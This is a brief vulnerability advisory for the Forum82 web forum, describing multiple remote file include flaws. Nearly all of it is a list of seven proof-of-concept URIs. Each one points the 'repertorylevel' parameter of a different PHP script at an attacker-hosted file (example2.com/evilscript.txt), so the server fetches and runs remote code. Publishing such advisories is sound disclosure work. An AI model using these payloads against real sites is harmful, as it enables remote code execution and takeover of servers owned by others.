|
Forum82 Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a web client. The following proof-of-concept URIs are available: http://www.example.com/[Forum82_Installed_DIR]/forum/search.php?repertorylevel=http://www.example2.com/evilscript.txt? http://www.example.com/[Forum82_Installed_DIR]/forum/message.php?repertorylevel=http://www.example2.com/evilscript.txt? http://www.example.com/[Forum82_Installed_DIR]/forum/member.php?repertorylevel=http://www.example2.com/evilscript.txt? http://www.example.com/[Forum82_Installed_DIR]/forum/mail.php?repertorylevel=http://www.example2.com/evilscript.txt? http://www.example.com/[Forum82_Installed_DIR]/forum/lostpassword.php?repertorylevel=http://www.example2.com/evilscript.txt? http://www.example.com/[Forum82_Installed_DIR]/forum/gesfil.php?repertorylevel=http://www.example2.com/evilscript.txt? http://www.example.com/[Forum82_Installed_DIR]/forum/forum82lib.php3?repertorylevel=http://www.example2.com/evilscript.txt? |
|
|
Privacy Statement |
